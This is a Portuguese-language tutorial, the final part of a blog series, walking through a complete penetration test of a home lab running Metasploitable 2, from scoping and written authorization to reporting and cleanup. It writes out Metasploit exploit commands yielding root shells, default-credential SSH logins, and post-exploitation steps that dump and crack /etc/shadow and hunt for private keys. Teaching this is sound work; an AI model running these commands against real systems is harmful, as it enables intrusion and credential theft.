O Caminho do Hacker: Série de 5 Partes
Parte 1: Introdução → Parte 2: Domínio do Flipper → Parte 3: Fundamentos do Kali → Parte 4: Exploração → Parte 5: A Auditoria Completa
Você começou esta série se perguntando o que os hackers realmente fazem. Aprendeu que não é sobre capuzes e texto verde. É resolução metódica de problemas. Você clonou crachás, mapeou redes, capturou handshakes e obteve shells em máquinas vulneráveis.
Agora juntamos tudo. Este artigo o guia por um teste de penetração completo contra um alvo fictício. Cada fase, cada decisão, cada descoberta, documentada exatamente como um profissional faria.
O Cenário
Cliente: Initech Labs (uma pequena empresa de tecnologia fictícia)
Escopo: Teste de penetração de rede interna
Objetivo: Identificar vulnerabilidades e demonstrar o impacto potencial nos negócios
Seu alvo: Sua própria rede de laboratório (Kali + Metasploitable 2 + quaisquer outras VMs que configurou)
Prepare um café. Vai ser divertido.
Fase 1: Pré-Engajamento
Antes de tocar em um teclado, pentesters profissionais lidam com o lado comercial. Pule isso, e você não é um pentester. É apenas alguém cometendo crimes.
A Chamada de Escopo
Em um engajamento real, você teria uma chamada com o cliente para entender:
- O que está no escopo? Quais redes, faixas de IP, aplicações?
- O que está fora do escopo? Sistemas de produção? Serviços de terceiros?
- Janela de teste? Quando pode testar? Apenas horário comercial?
- Pontos de contato? Para quem liga se algo quebrar?
- Objetivos? Conformidade ou melhoria real de segurança?
Para Seu Laboratório
Escopo: Apenas sua rede de laboratório isolada. Fora do escopo: Todo o resto. Janela de teste: Quando quiser. Objetivo: Aprender fazendo.
Regras de Engajamento
Engajamentos reais têm regras escritas:
- Carta de autorização - Documento assinado provando que você tem permissão
- Procedimentos de escalação - O que fazer se encontrar algo crítico
- Tratamento de dados - Como lidar com dados sensíveis encontrados
- Requisitos de limpeza - Remover todas as ferramentas e backdoors ao terminar
- Prazo do relatório - Quando o relatório final deve ser entregue?
Sempre Obtenha Permissão por Escrito
Mesmo para testes "amigáveis" na rede de um amigo. Um email assinado dizendo "você tem permissão para testar minha rede de DATA a DATA" pode ser a diferença entre uma experiência de aprendizado e uma condenação criminal. Leve isso a sério.
Fase 2: Reconhecimento
Hora de aprender tudo sobre o alvo. Em um engajamento real, incluiria OSINT: buscas no Google, perfis do LinkedIn, sites da empresa, registros DNS. Para nosso laboratório, vamos direto ao reconhecimento ativo.
Passo 1: Descoberta de Rede
baship a | grep inet
sudo nmap -sn 192.168.56.0/24 -oA discoveryDocumente tudo:
text# Initech Labs - Descoberta de Rede
# Data: 2026-03-08
# Testador: Seu Nome
192.168.56.1 - Gateway/Router
192.168.56.101 - Desconhecido (a investigar)
192.168.56.102 - Desconhecido (a investigar)Passo 2: Varredura de Portas
bashsudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101No Metasploitable 2, você verá um tesouro:
textPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
5432/tcp open postgresql PostgreSQL DB
...Que exposição. Atualize as notas:
text192.168.56.101 - Servidor Linux (Metasploitable)
- FTP (21): vsftpd 2.3.4 # Backdoor conhecido!
- SSH (22): OpenSSH 4.7p1 # Antigo
- Telnet (23): Ativo # Por que isso existe em 2026?
- HTTP (80): Apache 2.2.8 # Apps web para testar
- SMB (139/445): Samba 3.X # Mina de ouro potencial
- MySQL (3306): 5.0.51a # Acesso ao banco?
- PostgreSQL (5432): Ativo # Outro BDPasso 3: Identificação de Vulnerabilidades
bashsudo nmap --script vuln -oA vuln_scan 192.168.56.101
msfconsole
msf6 > search vsftpd
msf6 > search samba 3O backdoor do vsftpd 2.3.4 salta aos olhos imediatamente. É um shell garantido. Mas um bom pentester não para na primeira descoberta.
Fase 3: Exploração
Aqui as coisas ficam empolgantes. Temos múltiplos pontos de entrada. Vamos trabalhar sistematicamente.
Vetor de Ataque 1: Backdoor FTP
bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
[+] Backdoor service has been spawned
[+] Command shell session 1 opened
whoami
rootVetor de Ataque 2: Samba
bashmsf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit
whoami
rootOutro shell root por um vetor diferente. Dois caminhos independentes para comprometimento total.
Vetor de Ataque 3: Aplicações Web
bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
nikto -h http://192.168.56.101phpMyAdmin com credenciais padrão: root com senha em branco. Acesso de administrador ao banco de dados sem senha.
Vetor de Ataque 4: Credenciais SSH Fracas
bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'Fase 4: Pós-Exploração
Temos acesso. Um teste de penetração real demonstra o impacto nos negócios.
Coleta de Credenciais
bashcat /etc/shadow
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txtReconhecimento de Rede (De Dentro)
bashifconfig
route -n
netstat -tulpn
find / -name "id_rsa" 2>/dev/nullDescoberta de Dados Sensíveis
bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*password*" 2>/dev/null
mysql -u root -p
mysql> SHOW DATABASES;Escalação de Privilégios (de msfadmin)
bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontabFase 5: Documentação e Descobertas
O teste é inútil sem relatório.
Resumo das Descobertas
CRÍTICO: Backdoor no Serviço FTP (CVE-2011-2523)
Sistema Afetado: 192.168.56.101 | Risco: Execução remota de código não autenticada como root | Recomendação: Atualizar vsftpd imediatamente ou desabilitar o serviço FTP.
CRÍTICO: Execução Remota de Código Samba
Sistema Afetado: 192.168.56.101 | Recomendação: Atualizar Samba. Restringir acesso SMB.
ALTO: Acesso Root MySQL Sem Senha
Recomendação: Definir senha root forte. Restringir phpMyAdmin.
ALTO: Credenciais SSH Fracas
Recomendação: Implementar política de senhas fortes. Autenticação SSH baseada em chave.
MÉDIO: Serviço Telnet Habilitado
Recomendação: Desabilitar Telnet. Usar SSH.
BAIXO: Página phpinfo() Exposta
Recomendação: Remover ou restringir acesso.
Resumo Executivo
A equipe de segurança obteve controle administrativo completo do servidor principal em 10 minutos.
- 2 vulnerabilidades críticas permitindo controle remoto imediato
- 2 problemas de alta severidade expondo bancos de dados e credenciais
- Múltiplas descobertas médias e baixas indicando falhas sistêmicas
Fase 6: Limpeza e Encerramento
bashmsf6 > sessions -K
rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keysChecklist Metodológica Completa
Metodologia de Teste de Penetração
- Pré-Engajamento - Definir escopo, obter autorização escrita, configurar ambiente
- Reconhecimento - Descoberta de rede, varredura de portas, identificação de vulnerabilidades
- Exploração - Validar e explorar vulnerabilidades, documentar, capturar evidências
- Pós-Exploração - Coleta de credenciais, dados sensíveis, escalação de privilégios
- Relatório - Resumo executivo, descobertas com evidências, recomendações
- Limpeza - Remover ferramentas, fechar sessões, documentar mudanças
O Que Vem a Seguir: Seu Caminho
Você completou O Caminho do Hacker. Passou de "o que significa hacking?" para conduzir um teste de penetração completo.
Plataformas de Prática
- Hack The Box - Máquinas realistas. Comece com boxes "Fáceis" aposentados.
- TryHackMe - Caminhos de aprendizado guiados.
- VulnHub - VMs vulneráveis gratuitas.
- PentesterLab - Foco em segurança de aplicações web.
Certificações
- eJPT - Excelente ponto de partida, exame prático
- OSCP - Padrão da indústria, brutal mas respeitado
- PNPT - Moderno, prático, inclui escrita de relatório
- CEH - Para requisitos corporativos, menos prático
Especializações
- Segurança de Aplicações Web - OWASP, Burp Suite, SQL injection, XSS
- Active Directory - A maioria dos ambientes corporativos o utiliza
- Segurança em Nuvem - Pentesting AWS, Azure, GCP
- Segurança Móvel - Testes de aplicações Android/iOS
- Red Teaming - Simulação completa de adversário
- Engenharia Reversa - Análise de malware, desenvolvimento de exploits
Construa Seu Laboratório Doméstico
- Adicione Windows Server com Active Directory
- Configure um domain controller
- Implante aplicações web vulneráveis (DVWA, bWAPP, WebGoat)
- Construa uma rede com múltiplos segmentos
- Adicione HoneyAegis para ver ataques da perspectiva do defensor
O Caminho do Hacker: Completo
Você conseguiu. Todas as cinco partes, de curioso a capaz.
Parte 1: Introdução Parte 2: Domínio do Flipper Parte 3: Fundamentos do Kali Parte 4: Exploração Parte 5: A Auditoria Completa
Série Completa - Sua Jornada
Parte 1: Aprendeu o que hacking realmente é e obteve suas primeiras vitórias com o Flipper Zero
Parte 2: Dominou cada protocolo Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO
Parte 3: Construiu seu laboratório Kali, aprendeu nmap e capturou handshakes WiFi
Parte 4: Dominou Metasploit, exploração, escalação de privilégios e pivoting
Parte 5: Juntou tudo em uma metodologia completa de teste de penetração
Segurança não é um destino. É uma prática. As ferramentas mudarão, as vulnerabilidades evoluirão, mas a metodologia permanece. Questione tudo. Documente tudo. Nunca pare de aprender.
Bem-vindo ao outro lado.
- Lee